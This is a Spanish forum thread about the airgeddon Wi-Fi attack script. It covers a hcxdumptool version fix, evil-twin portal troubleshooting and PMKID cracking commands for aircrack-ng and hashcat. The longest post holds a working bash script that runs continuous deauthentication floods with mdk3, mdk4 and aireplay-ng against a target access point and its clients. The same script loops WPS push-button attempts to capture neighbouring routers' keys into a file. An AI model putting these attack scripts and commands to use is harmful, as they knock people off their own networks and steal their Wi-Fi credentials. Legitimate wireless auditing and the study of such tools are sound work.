Autor Tema: Script multiuso en bash, airgeddon  (Leído 362387 veces)

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado v1s1t0r

  • *****
  • Mensajes: 100
Re:Script multiuso en bash, airgeddon
« Respuesta #460 en: 20-03-2020, 12:21 (Viernes) »
@AntonioJaen sí que se puede lanzar el ataque contra una red de 5ghz lo que pasa es que como había tarjetas que daban problemas con ciertos canales creo (así de memoria) que lo que hace airgeddon es lanzar el DoS contra el canal de 5ghz y crear el evil twin en un canal de 2.4ghz ... para la victima es casi transparente. Le va a aparecer igualmente una red abierta (la falsa) independientemente de si es en los 5ghz o no.

@USUARIONUEVO , bajé la iso nueva, la instalé y varias cosas... la primera, vi que la versión de airgeddon que viene es la v10.0 , pero me imagino que estarás preparando la nueva para que lleve esta versión nueva v10.10 . Vi que ya incluíste de base el hostapd-wpe, gracias por ello.

Respecto al error de que se cierra y abre la ventana, ya se porque es... he estado analizando el comando que se lanza y es este:

hcxdumptool -i wlan0mon --enable_status=1 --filterlist=/tmp/target.txt --filtermode=2 -o /tmp/pmkid.pcapng

Y está dando erro con la siguiente salida:
hcxdumptool: option '--filterlist=/root/target.txt' is ambiguous; possibilities: '--filterlist_ap' '--filterlist_client'
hcxdumptool 6.0.0 (C) 2019 by ZeroBeat
usage: hcxdumptool -h for help

Bien, ¿por qué este error no lo he detectado? porque como ya sabéis, yo suelo trabajar de base con Linux Debian based, y en estas distros (Parrot, Kali, etc) la versión de hcxdumptool que viene es la 5.1.7 y se ve que el comando ya no le vale a la nueva versión 6 que usa Wifislax. Por el contrario, el comando hcxpcaptool (que es lo que hay que lanzar después) sí que es la versión 5.3.0 por ahora en todos los sistemas y se comporta igual así que imagino que ahí no hay problema.

Me pondré a ello... intentaré buscar un comando que valga para todas las versiones o si no, detectaré la versión previamente para que funcione bien en todos los casos. Este problema me lo iba a encontrar tarde o temprano en las Debian based cuando se actualizase el paquete, así que gracias... me pondré a trabajar en una versión v10.11 con el hotfix.



Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15019
Re:Script multiuso en bash, airgeddon
« Respuesta #461 en: 20-03-2020, 22:36 (Viernes) »
Descargando la última iso de Wifislax (que si no estoy muy desactualizado es la 2.1-rc1) y haré pruebas... a ver si me funciona a mi o si consigo reproducir el error.

¿Esta lleva ya instalado de base el hostapd-wpe? ¿o sigue haciendo falta instalar el módulo que compilaste en su día? lo digo porque alguien andaba preguntando en un canal de discord el otro día, y les remití aquí y al link del módulo que lo subí a mi mega. Dejo el link por aquí otra vez: https://mega.nz/#!IQgzhIoD!7R_ohvavnKX5IzUlVSI5sx-Xf4kGWuvi8CiLEWn8ghU

Lo dicho, echo un ojo y os digo a ver que puede estar pasando.

Saludos.

lleva todas las dependencias ...

Desconectado v1s1t0r

  • *****
  • Mensajes: 100
Re:Script multiuso en bash, airgeddon
« Respuesta #462 en: 21-03-2020, 10:44 (Sábado) »
Ale, ya está fixeado... he aquí el commit: https://github.com/v1s1t0r1sh3r3/airgeddon/commit/fdf8830c2562de87de25d90ded9c24fa8a00d361

Ahora airgeddon chequea la versión de hcxdumptool y si es menor de la v6 pone los parámetros de una manera y si es la 6 o superior los pone de otra tal y como necesita la tool. Probado en Wifislax y en otras distros y funcionando!!

Los cambios están de momento en la rama dev del github... serán para la futura v10.11, que tardará en salir porque quiero hacer alguna cosilla más... no obstante, si lo quereis probar, ya sabeis... un git clone de la rama de dev y veréis que funciona ok: git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon

Os pido paciencia porque el tema de hacer pasos a "producción" (es decir, de dev a master) lleva su tiempo.... traducciones si hubo cambios en las frases, otros cambios, etc...

@USUARIONUEVO, ya casi espérate a la versión 10.11 para añadirla a Wifislax... pero tú nunca cojas de dev porfa, que luego haré mas cambios y así no hay lios de versiones... siempre de master. Si quieres coger de dev para probar ok... pero para incluir oficialmente... paciencia please... gracias a tod@s!

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15019
Re:Script multiuso en bash, airgeddon
« Respuesta #463 en: 21-03-2020, 20:14 (Sábado) »
me temia algo del estilo , algun cambio en los argumentos de uso .... lo probare y lo empaquetare como 10.10 a secas ...o 10.10_commit

probado con hcxdumptool-6.0.3 y todo ok , lo unico que veo la version dev es 10.11 asi que lo empaquetare 10.11_commit  , te recomiendo que el paquete para archlinux, lo arregles, puesto que ellos tambien usan version 6.0.X
« Última modificación: 21-03-2020, 20:26 (Sábado) por USUARIONUEVO »

Desconectado sol666

  • ****
  • Mensajes: 75
Re:Script multiuso en bash, airgeddon
« Respuesta #464 en: 21-03-2020, 22:43 (Sábado) »
hola,acabo de probarlo y efectivamente obtiene el pmkid y lo guarda en un .txt pero a la hora de ejecutarlo desde el menu de descifrado con aircrack no lo hace, ¿es asi el script, no deberia de pasarle el pmkid al aircrack con el parametro -I?

Ejemplo a mano: aircrack-ng -I 2582a8281bf9d4308d6f5731d0489624*4604baf25693*89acf0e761f4*ed487162465a774bfba60eb603a39f3a -w /diccionario

Desconectado dynyly

  • *****
  • Mensajes: 147
Re:Script multiuso en bash, airgeddon
« Respuesta #465 en: 22-03-2020, 02:17 (Domingo) »
salu2

-l <file>  : write key to file. Overwrites file.

yo es como hago para pasar pmkid con aircrack-ng
MACXXXX   es la mac del ap
Código: [Seleccionar]
tshark -r $DIRECTORIO/attack.pcap -R "(wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || eapol && wlan.addr==MACXXXX)" -2 -w $DIRECTORIO/$convertido.cap -F pcap
« Última modificación: 22-03-2020, 02:18 (Domingo) por dynyly »

Desconectado v1s1t0r

  • *****
  • Mensajes: 100
Re:Script multiuso en bash, airgeddon
« Respuesta #466 en: 22-03-2020, 09:45 (Domingo) »
@USUARIONUEVO, casí espérate a meter la 10.11, y no te preocupes que cada versión, cuando llega a master tiene su paquete nuevo (el binario de kali y el de arch), y voy actualizando los repos de parrot, el de AUR de arch, etc...

@SOL666, el txt que sale es para Auditarlo desde el menú de descifrado con hashcat, no es formato para Auditarlo con aircrack. Es simplemente en formato hash para romperlo con hashcat.

Para que se pueda romper con aircrack ha de ser un format .cap, y precisamente estoy ahora modificando airgeddon para incluir en la v10.11 también más cambios... para que por ejemplo si estás capturando un handshake y en lugar del handshake pillas casualmente un pmkid airgeddon también lo detecte y te avise. En ese caso sí que te quedaría un .cap que se puede romper con aircrack, cuando es capturado con airdoump. Y todo ello validado ya que todo lo de pmkid en aircrack es solo para versiones >= 1.4. Os pido paciencia, que estoy trabajando en ello.

Saludos.
« Última modificación: 22-03-2020, 13:57 (Domingo) por v1s1t0r »

Desconectado sol666

  • ****
  • Mensajes: 75
Re:Script multiuso en bash, airgeddon
« Respuesta #467 en: 22-03-2020, 10:46 (Domingo) »
aircrack tambien lo rompe con el parametro -I a partir de la version 1.6 como he puesto en el ejemplo,solo seria cuestion de pasarle a aircrack lo que hay dentro del archivo .txt

Código: [Seleccionar]
aircrack-ng -I 2582a8281bf9d4308d6f5731d0489624*4604baf25693*89acf0e761f4*ed487162465a774bfba60eb603a39f3a -w /diccionario

Desconectado v1s1t0r

  • *****
  • Mensajes: 100
Re:Script multiuso en bash, airgeddon
« Respuesta #468 en: 22-03-2020, 11:28 (Domingo) »
Por cierto @dynyly me ha gustado mucho la forma esa de convertir con tshark de la captura del hcxdumptool a formato cap del que entiende aircrack. Lo he probado y funciona muy bien. Es muy posible que en una versión posterior (para la v10.11 ya tengo mucho trabajo)... pero igual para una versión 10.20 no descarto añadirlo y que tras la captura, además de dejarte el formato de hashcat te deje un cap que aircrack entienda... gracias!!!

Desconectado sol666

  • ****
  • Mensajes: 75
Re:Script multiuso en bash, airgeddon
« Respuesta #469 en: 22-03-2020, 11:42 (Domingo) »
no se,a pesar de tener el driver nvidia instalado no me funciona desde el menu hashcat,pongo una captura

******************** Menú de descifrado WPA/WPA2 offline **********************
BSSID seleccionado: Ninguno
Fichero capturado seleccionado: Ninguno

Selecciona una opción del menú:
---------
0.  Volver al menú de descifrado WPA/WPA2 offline
--------------- (ataques aircrack CPU, no GPU) ---------------
1.  (aircrack) Ataque de diccionario sobre fichero de captura Handshake/PMKID
2.  (aircrack + crunch) Ataque de fuerza bruta sobre fichero de captura Handshake/PMKID
--------------- (ataques hashcat CPU, no GPU) ----------------
3.  (hashcat) Ataque de diccionario sobre fichero de captura Handshake
4.  (hashcat) Ataque de fuerza bruta sobre fichero de captura Handshake
5.  (hashcat) Ataque basado en reglas sobre fichero de captura Handshake
6.  (hashcat) Ataque de diccionario sobre fichero de captura PMKID
7.  (hashcat) Ataque de fuerza bruta sobre fichero de captura PMKID
8.  (hashcat) Ataque basado en reglas sobre fichero de captura PMKID
---------
*Consejo* Descifrando por fuerza bruta, podrían pasar horas, días, semanas o incluso meses hasta conseguirlo dependiendo de la complejidad de la contraseña y de tu velocidad de proceso
---------
> 6

Tienes hashcat instalado (v5.1.0). Cumples con el requisito de versión para realizar el ataque PMKID con hashcat (versión minima v4.2.0). El script puede continuar...
Pulsa la tecla [Enter] para continuar...

Introduce la ruta de un fichero de captura:
> /root/pmkid-6A:D3:F2:C6:9A:E6.txt
La ruta al fichero de captura es válida. El script puede continuar...

El fichero seleccionado tiene un formato válido de hashes PMKID para hashcat
Pulsa la tecla [Enter] para continuar...

Introduce la ruta de un fichero de diccionario:
> /run/media/root/Wifislax64-2.0/root/Desktop/prueba
La ruta al fichero de diccionario es válida. El script puede continuar...

Comenzando descifrado. Una vez empezado, pulse [Ctrl+C] para pararlo...
Pulsa la tecla [Enter] para continuar...
hashcat (v5.1.0) starting...

No devices found/left.

Started: Sun Mar 22 11:33:03 2020
Stopped: Sun Mar 22 11:33:03 2020
Pulsa la tecla [Enter] para continuar...
 
« Última modificación: 22-03-2020, 11:54 (Domingo) por sol666 »

Desconectado v1s1t0r

  • *****
  • Mensajes: 100
Re:Script multiuso en bash, airgeddon
« Respuesta #470 en: 22-03-2020, 13:52 (Domingo) »
si, pero tu problema no tiene q ver con airgeddon... parece q no te funciona bien hashcat... no tendrás bien puestos los drivers opencl para CPU. Porque el hashcat de airgeddon es para CPU, no para GPU (lo pone bien claro en el menú). Si quieres usar GPU has de hacerlo fuera de airgeddon.

Prueba a usar hashcat desde fuera de airgeddon... con --force -D 1 sería CPU y con --force -D 2 sería GPU. Saludos!
« Última modificación: 22-03-2020, 13:56 (Domingo) por v1s1t0r »

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 15019
Re:Script multiuso en bash, airgeddon
« Respuesta #471 en: 22-03-2020, 20:10 (Domingo) »
vale , pues me espero a 10.11 aunque ya habia empaquetado la dev , mejor asi.

Desconectado v1s1t0r

  • *****
  • Mensajes: 100
Re:Script multiuso en bash, airgeddon
« Respuesta #472 en: 24-03-2020, 20:47 (Martes) »
Ale, ya está la v10.11 en master. A por ello! Graciassss...  ^-^

Saludos!
« Última modificación: 24-03-2020, 21:04 (Martes) por v1s1t0r »

Desconectado radoman29

  • **
  • Mensajes: 38
Re:Script multiuso en bash, airgeddon
« Respuesta #473 en: 24-03-2020, 22:50 (Martes) »
muchas gracias por tu gran trabajo v1s1t0r

saludos chicos de wifislax  >:( >:( >:( >:( >:( >:(

Desconectado AntonioJaen

  • **
  • Mensajes: 11
Re:Script multiuso en bash, airgeddon
« Respuesta #474 en: 28-03-2020, 17:03 (Sábado) »
v1s1t0r, uso wifislax 64 1.1. Tengo airgeddon 10.11 ero cuando me ataco con evil twin mi red de 5 ghz, se monta el ap falso, te conectas, te lleva a la página de autentificacion, pongo la clave y al aceptar da error la pagina falsa y airgeddon tampoco recibe nada. Por que puede ser?
« Última modificación: 28-03-2020, 18:31 (Sábado) por AntonioJaen »

Desconectado dynyly

  • *****
  • Mensajes: 147
Re:Script multiuso en bash, airgeddon
« Respuesta #475 en: 29-03-2020, 17:07 (Domingo) »
salu2
la verdad no creo que sea capaz de crear el plugin con configuarcion personal
Solo comparto la idea desde la humildad de compartir ideas o conocimientos el de verdad entiende de code es usted Visitor ademas al ser el creador del script sabe por donde es mejor introducir las modificaciones
quizas sea un poco retorcido lo querria explicar o quizas no sepa explicarme yo bien pero lo estoy haciendo en script ...

1 su script ya detecta ifaces 5G y crea ap 5G al parecer pero lo veo un poco no se
 (¿poque no? crear ap en 2G en iface 2G y usar iface 5G para ddoss 5G + wps-cli
 ademas la iface 5G parara Ddoss para verificar si hay cambio canal en caso de cambio procede si no continua )

mi forma de ver las cosas aunque con sus ideas lo haria mucho mejor eso fijo ...
detecta iface 5g y la uso para scan de ap disponibles
muestro solo las redes 2G del scan
Código: [Seleccionar]
cat $DUMP_PATH/captura/dump-02.csv | awk -F "," '$4 < 14 { print  $0 }'
y analizo en captura si hay red 5G del AP seleccionado
Código: [Seleccionar]
busca_AP_5G=$(echo ${Host_MAC:3:11})
cat "$DUMP_PATH/captura/dump-02.csv" | awk ' { printf "  %-25s %-22s %-10s %-10s %-10s\n", $1,$14,$4,$9,$6}' FS=","  | grep -v "$Host_MAC" | grep "$busca_AP_5G"

si hay que proceda a ddos 5G con iface con soporte 5G y meto los AP 5G en blacklist de mdk4
ademas verificar el si hay clientes conectados a ambas bandas clientes para blacklist ;extraer el cliente de mas potencia para tirarle con aireplay-ng
Código: [Seleccionar]
cat $DUMP_PATH/captura/clientes.csv | grep -a $Host_MAC | awk '{ print $4,$1 }' FS="," | grep -a -v 00:00:00:00| grep -v $Host_MAC | awk '{ print $2,$1 }' FS="-"> "$DUMP_PATH/doss/clientes.txt"
echo "$Host_MAC">>$DUMP_PATH/doss/black-list-mdk3.txt
FICHERO_CLIENTES_2G=$DUMP_PATH/doss/clientes.txt
if [ -s $FICHERO_CLIENTES_2G ] ; then  ## -s Verifica si el archivo esta vacio
cat $DUMP_PATH/doss/clientes.txt | cut -d" " -f2>>$DUMP_PATH/doss/black-list-mdk3.txt ## clientes blacklist mdk3
awk '$1 > max { max=$1; linea=$0 }; END { print max, linea }' $DUMP_PATH/doss/clientes.txt >>$DUMP_PATH/doss/aireplay.txt  #Extrae cliente con mas cercano para aireplay-ng
Client_aireplay=$(cat $DUMP_PATH/doss/aireplay.txt | awk '{ print $3}'| grep ".")
echo "ddos clientes ">$DUMP_PATH/doss/ddos2.txt
else  ## No hay clientes el archivo esta vacio
echo "ddos sin clientes ">$DUMP_PATH/doss/ddos1.txt
rm -rf $DUMP_PATH/doss/clientes.txt
fi

if [ -e $DUMP_PATH/captura/si-hay-red-5G.txt ] ; then ## Verifica si hay red 5G
cat $DUMP_PATH/captura/clientes.csv | grep -a $BSSID_5G | awk '{ print $4,$1 }' FS="," | grep -a -v 00:00:00:00| grep -v $BSSID_5G | awk '{ print $2,$1 }' FS="-"> "$DUMP_PATH/doss/clientes-5G.txt"
FICHERO_CLIENTES_5G=$DUMP_PATH/doss/clientes-5G.txt
if [ -s $FICHERO_CLIENTES_5G ] ; then   # -s Verifica si el archivo esta vacio
echo "ddos  clientes 5G">$DUMP_PATH/doss/ddos2-5G.txt
cat $DUMP_PATH/doss/clientes-5G.txt | cut -d" " -f2 >> $DUMP_PATH/doss/black-list-mdk4.txt # clientes 5G blacklist Mdk4
awk '$1 > max { max=$1; linea=$0 }; END { print max, linea }' $DUMP_PATH/doss/clientes-5G.txt >>$DUMP_PATH/doss/aireplay-5G.txt
Client_aireplay_5G=$(cat $DUMP_PATH/doss/aireplay-5G.txt | awk '{ print $3}'| grep ".")
else  ## No hay clientes el archivo esta vacio
echo "ddos sin clientes 5G">$DUMP_PATH/doss/ddos1-5G.txt
rm -rf $DUMP_PATH/doss/clientes-5G.txt
fi
## combina clientes en las blacklists fuerza la no conexion de cliente en ambas bandas
if   [ -e $DUMP_PATH/doss/clientes.txt ] ; then
head $DUMP_PATH/doss/clientes.txt | cut -d" " -f2>> $DUMP_PATH/doss/black-list-mdk4.txt
elif [ -e $DUMP_PATH/doss/clientes-5G.txt ] ; then
head $DUMP_PATH/doss/clientes-5G.txt | cut -d" " -f2 >> $DUMP_PATH/doss/black-list-mdk3.txt
fi
rm -rf $DUMP_PATH/doss/clientes-5G.txt $DUMP_PATH/doss/clientes.txt
fi
  ataqua_doss

-----------
si el router no emite bandas 5G se usara iface igualmente para Ddos 2G  mdk4  y aireplay-ng + wpa_supplicant + wps_cli    capturando  posibles pussh button de los routers de alrededores
pero parando ddos cada x tiempo para verificar posible cambio de canal todo ello con la segunda iface2 code extraido de wps_pbc de Kdctv

   
Código: [Seleccionar]
while true ; do
killall wpa_supplicant dhclient 2>/dev/null
if [ -e $DUMP_PATH/stop-bucle.txt ] ; then
   echo "\t Saliendo" & break & exitmode
fi
wpa_supplicant -c $DUMP_PATH/PBC.conf -D nl80211 -i $iface_2 -B &>$linset_output_device &
sleep 1
wpa_cli -i $iface_2 wps_pbc any &>$linset_output_device
if ( grep -q "network=" $DUMP_PATH/PBC.conf ) ; then
        echo -e $verde$subrayar"\t Key negociation completada!"$rescolor
wpakey=$( grep "psk=" $DUMP_PATH/PBC.conf | cut -d = -f 2 | cut  -c 2- | rev | cut -c 2- | rev )
essid=$( grep "ssid=" $DUMP_PATH/PBC.conf | cut -d = -f 2 | tr -d '"' )
killall wpa_supplicant dhclient &>/dev/null
echo -e $verde"\t Key negociation completed! $wpakey"$rescolor >>/root/Desktop/clave.txt
echo -e $verde"\t WPA Key: $essid"$rescolor>>/root/Desktop/clave.txt
echo -e $verde"\t $essid : $wpakey"$rescolor
rm -rf $DUMP_PATH/PBC.conf
sleep 5
break & matartodo & exitmode
fi
sleep 120 &>$linset_output_device
done

   
y el ddoss en bucle parando cada x tiempo y verificando posible cambio de canal y procediendo si hay cambio o no
Código: [Seleccionar]
function ataqua_doss {
while true ; do
kill $mdk3PID &>$linset_output_device
kill $aireplayPID &>$linset_output_device
killall aireplay-ng &> $linset_output_device
killall mdk3 &> $linset_output_device
kill $mdk4PID &>$linset_output_device
kill $aireplay_5G_PID &>$linset_output_device
killall mdk4 &> $linset_output_device
if [ -e $DUMP_PATH/stop-bucle.txt ] ; then
   echo "   Saliendo" & break
fi

if [ -e $DUMP_PATH/doss/ddos1.txt ] ; then
#iwconfig $WIFI_MONITOR channel $Host_CHAN
xterm $HOLD -bg "#000000" -fg "#FF0009" -title "MDK3" -geometry ${g4_bottomright_window} -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/doss/black-list-mdk3.txt -c $Host_CHAN -s 1024&
mdk3PID=$!

xterm $HOLD -bg black -fg red -geometry ${g4_middleleft_window} -T "Aireplay 2G" -e aireplay-ng -0 0 -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &
aireplayPID=$!
elif [ -e $DUMP_PATH/doss/ddos2.txt ] ; then
#iwconfig $WIFI_MONITOR channel $Host_CHAN
xterm $HOLD -bg "#000000" -fg "#FF0009" -title "MDK3" -geometry ${g4_bottomright_window} -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/doss/black-list-mdk3.txt -c $Host_CHAN -s 1024&
mdk3PID=$!

xterm $HOLD -bg black -fg red -geometry ${g4_middleleft_window} -title "Aireplay 2G" -e aireplay-ng -0 0 -a $Host_MAC -c $Client_aireplay --ignore-negative-one $WIFI_MONITOR &
aireplayPID=$!
fi

if [ -e $DUMP_PATH/captura/si-hay-red-5G.txt ] ; then  ############# Verfifica si hay red 5G a ataquar
if [ -e $DUMP_PATH/doss/ddos1-5G.txt ] ; then
#iwconfig ${iface_2}mon channel $CANAL_5G
xterm $HOLD -bg black -fg red -geometry ${g4_middleright_window} -title "MDK4" -e mdk4 ${iface_2}mon d -c ${CANAL_5G} -b $DUMP_PATH/doss/black-list-mdk4.txt -s 1024 -x &
mdk4PID=$!
xterm $HOLD -bg black -fg red -geometry ${g4_topleft_window} -title "Aireplay 5G" -e aireplay-ng -0 0 -a ${BSSID_5G} --ignore-negative-one ${iface_2}mon &
aireplay_5G_PID=$!

elif [ -e $DUMP_PATH/doss/ddos2-5G.txt ] ; then
#iwconfig ${iface_2}mon channel $CANAL_5G
xterm $HOLD -bg black -fg red -geometry ${g4_middleright_window} -title "MDK4" -e mdk4 ${iface_2}mon d -c ${CANAL_5G} -b $DUMP_PATH/doss/black-list-mdk4.txt -s 1024 &
mdk4PID=$!

xterm $HOLD -bg black -fg red -geometry ${g4_topleft_window} -title "Aireplay 5G" -e aireplay-ng -0 0 -a ${BSSID_5G} -c $Client_aireplay_5G --ignore-negative-one ${iface_2}mon &
aireplay_5G_PID=$!
fi
else   #### si no hay Red 5G usa iface2 para Ddoss Mdk4 + Aireplay-ng
if [ -e $DUMP_PATH/doss/ddos1.txt ] ; then
xterm $HOLD -bg "#000000" -fg "#FF0009" -title "MDK4" -geometry ${g4_bottomright_window} -e mdk4 ${iface_2}mon d -b $DUMP_PATH/doss/black-list-mdk3.txt -c $Host_CHAN -s 1024&
mdk4PID=$!

xterm $HOLD -bg black -fg red -geometry ${g4_middleleft_window} -T "Aireplay 2G" -e aireplay-ng -0 0 -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &
aireplay_5G_PID=$!
elif [ -e $DUMP_PATH/doss/ddos2.txt ] ; then
xterm $HOLD -bg "#000000" -fg "#FF0009" -title "MDK4" -geometry ${g4_bottomright_window} -e mdk4 ${iface_2}mon d -b $DUMP_PATH/doss/black-list-mdk3.txt -c $Host_CHAN -s 1024&
mdk4PID=$!

xterm $HOLD -bg black -fg red -geometry ${g4_middleleft_window} -title "Aireplay 2G" -e aireplay-ng -0 0 -a $Host_MAC -c $Client_aireplay --ignore-negative-one ${iface_2}mon &
aireplay_5G_PID=$!
fi
fi
Verifica_fallo_hostapd="hostapd"   ############# Detiene el script si hay fallos con hostapd
if pgrep -x "$Verifica_fallo_hostapd" &>$linset_output_device ;then
echo "OK"
else
conditional_clear
mostrarheader
echo -e $rojo"Hay problemas con Hostapd quizas la interface no sea compatible"
echo -e "Deteniendo el Ataque y saliendo"$rescolor
sleep 5
break & matartodo & exitmode
fi
espera_para & sleep ${seconde} &>$linset_output_device ############# vuelve a menu y duerme el tiempo introducido

#### Mata procesos de ddos y crea directorio de checkap
kill $mdk3PID &>$linset_output_device
kill $aireplayPID &>$linset_output_device
kill $mdk4PID &>$linset_output_device
kill $aireplay_5G_PID &>$linset_output_device
killall aireplay-ng &> $linset_output_device
killall mdk3 &> $linset_output_device
killall mdk4 &> $linset_output_device
mkdir $DUMP_PATH/checkap
#### Detiene Ddoss y Verifica posible cambio de canal
echo
echo -e $verde$subrayar"\t Deteniendo Ddoss"$rescolor""
echo -e "$amarillo\t Verifificando si hay cambio de canal"$rescolor""
xterm -hold -bg '#000000' -fg '#3A94FF' -title "Verifica Canal" -e airodump-ng --encrypt wpa --band abg -w $DUMP_PATH/checkap/captura ${iface_2}mon -a &> /dev/null &
airodumpPID_5G_PID=$!
sleep 30;
var2=$(cat $DUMP_PATH/checkap/captura-01.kismet.csv  | grep "$Host_MAC" | cut -d";" -f6)
if [ $var2 = $Host_CHAN ] ;then  # Compara variable var2 con numero del canal
Verifica_channel=$(echo -e "\t${verde}$var2 El ap 2G sigue en el mismo canal $Host_CHAN..$rescolor")
kill $airodumpPID_5G_PID
else
unset Host_CHAN
Host_CHAN=$(cat $DUMP_PATH/checkap/captura-01.kismet.csv  | grep "$Host_MAC" | cut -d";" -f6)
Verifica_channel=$(echo -e "\t ${amarillo}$var2 El ap 2G cambio de canal $Host_CHAN...$rescolor")
kill $airodumpPID_5G_PID
fi

if [ -e $DUMP_PATH/captura/si-hay-red-5G.txt ] ; then
var1=$(cat $DUMP_PATH/checkap/captura-01.kismet.csv  | grep "$BSSID_5G" | cut -d";" -f6)
if [ $var1 = $CANAL_5G ] ;then  # Compara variable var1 con numero del canal 5G
Verifica_channel_5G=$(echo "\t ${verde}$var1 El ap 5G sigue en el mismo canal $CANAL_5G...$rescolor")
kill $airodumpPID_5G_PID
else
unset CANAL_5G
kill $airodumpPID_5G_PID
CANAL_5G=$(cat $DUMP_PATH/checkap/captura-01.kismet.csv  | grep "$BSSID_5G" | cut -d";" -f6)
Verifica_channel_5G=$(echo -e "\t ${amarillo}$var1 El ap 5G cambio de canal $CANAL_5G$rescolor")
fi
fi

espera_para &
rm -rf $DUMP_PATH/checkap
done
}

-----------
otra cosa no todas las interfaces son compatibles con hostapd yo tengo una por ejemplo
para que tenga fallo deberia verificar tal fallo y si lo hay parar script en el code anterior lo hace
creo que es algo muy importante ya que si no funciona hostapd ¿ para que continue el script a lo tonto mejor que ejecute salida?

      
Código: [Seleccionar]
Verifica_fallo_hostapd="hostapd"   ############# Detiene el script si hay fallos con hostapd
if pgrep -x "$Verifica_fallo_hostapd" ;then
echo "OK"
else
echo -e $rojo"Hay problemas con Hostapd quizas la interface no sea compatible"
echo -e "Deteniendo el Ataque y saliendo"$rescolor
fi
      
---
todo ello ha sido testado y probado con 2 interfaces
1 interface con soporte bandas 5G
testado y probado
Sabiendo que hay problemas de inyeccion en algunas interfaces con soporte 5G

si quiere code mas completo sin problemas cuando usted quiera ...
pero recuerde que solo es una idea ni recomendacion usted tiene mas conocimento de code que yo
todo ello con humildad y admiracion por su script

Desconectado v1s1t0r

  • *****
  • Mensajes: 100
Re:Script multiuso en bash, airgeddon
« Respuesta #476 en: 31-03-2020, 09:50 (Martes) »
@AntonioJaen, define "da error la pagina falsa" ... eso es muy genérico... no se lo que puede estar pasando, porque la página del portal es la misma para una red de 2.4 q para una de 5ghz. ¿Solo no te funciona en la de 5?

@dynyly lo que propones es un funcionamiento muy diferente... eso ya sería otro script. airgeddon tiene este funcionamiento que es el que me parece adecuado a mi... que no tiene por qué ser perfecto, pero es el que creo más conveniente. De tu planteamiento no me parece bien que tengas un interfaz de 5ghz y al escanear solo se muestren redes de 2ghz... y luego que al elegir una, se mire si hay esa misma red de 5ghz.... ¿qué pasa si una red solo tiene 5ghz y no tiene 2.4ghz? según tu planteamiento se quedaría fuera y no podrías lanzarle un ataque. También das por hecho que una red tiene el mismo nombre ESSID en 2.4ghz que en 5ghz. Eso es cierto la mayoría de las veces, pero no tiene por qué ser así. Creo que las redes hay que tratarlas completamente por separado como si cada una fuera absolutamente distinta.

Por cierto, eso que llamas ddos, sería más bien dos (a secas). Denial of Service, pero en ningún caso estámos haciendo un Distributed Denial of Service que es una cosa muy distinta.  :D

Desconectado dynyly

  • *****
  • Mensajes: 147
Re:Script multiuso en bash, airgeddon
« Respuesta #477 en: 31-03-2020, 18:26 (Martes) »
salu2
 quizas no me he explicado bien
lo de la denegacion de servio se entiende aunque no me explique bien
2 interfaces se detecta cual tiene soporte 5ghz
se seleciona automaticamente para scan se muestran solo las 2GHZ rara es la vez que solo sea 5ghz
aumque el nobre cambie no importa se busca por mac   y por lo visto las 5Ghz difieren en la mac  el el ultimo par y primer par de cararcters de mac
Código: [Seleccionar]
busca_AP_5G=$(echo ${Host_MAC:3:11})
cat "$DUMP_PATH/captura/dump-02.csv" | awk ' { printf "  %-25s %-22s %-10s %-10s %-10s\n", $1,$14,$4,$9,$6}' FS=","  | grep -v "$Host_MAC" | grep "$busca_AP_5G"
lo dicho busco mac si los 2 caracterts primeros ni los 2 ultimos aunque cambien el nombre a maria antonia de hecho tambiuen te mostrara la famosa oculta 5G que tienen  los routers de mifibra para la blacklist de md4 ya que es el mismo router y mismo canal  (funciona testado y probado)
------
respecto a usar una iface solo para verficar cambio de canal ni me fijado pero que estas tol dia capturando con airodump-ng 
un desperdicio no usarla almismo tiempo con wpa_supplicant + wpa_cli  capturando posibles pussbutton de router de alrederoes
denegacion de servicio y cada 3 minutos se para denegacion de servicio para verificar con airodump el posible cambio de canal   ( tambien testado )

puedes crear ap en la frecuencia que quiera 2G o 5G ¿pero cuendo haces un  ap 5G tambein haces denegacion a ambas bandas que es lo digo )

ya no digo lo de extraccion de clientes y demas   pero los expuesto es coherente y estoy haciendolo
solo son ideas quizas no sean muy estables
gracias por compartir
« Última modificación: 01-04-2020, 01:27 (Miércoles) por dynyly »

Desconectado v1s1t0r

  • *****
  • Mensajes: 100
Re:Script multiuso en bash, airgeddon
« Respuesta #478 en: 01-04-2020, 10:44 (Miércoles) »
Efectivamente eso no es muy estable... una tarjeta tiene solo una antena, y no puedes actuar en más de un canal a la vez... así que si estás haciendo operaciones en 2.4 y luego en 5 y vas cambiando para hacer cosas, la otra actividad la dejas "colgada" hasta que vuelvas a ese canal.... por lo que en un ataque evil-twin, si dejas de hacer DoS, los clientes legítimos se van a conectar al AP. No me gusta mucho la idea, lo siento. No obstante, si a ti te funciona, te animo a que hagas un script y lo compartas para que la gente que quiera, lo pueda usar.

Desconectado dynyly

  • *****
  • Mensajes: 147
Re:Script multiuso en bash, airgeddon
« Respuesta #479 en: 01-04-2020, 13:19 (Miércoles) »
salu2
 ;D ;D   cada antena en su canal  ...seria una burrada lo que comentas
perdona si te he molestado no pretendo dar clase
serias tu quiem deberias darmelas pues tienes mas conocimiento
airgedon code fuerte
THANKS
« Última modificación: 01-04-2020, 18:42 (Miércoles) por dynyly »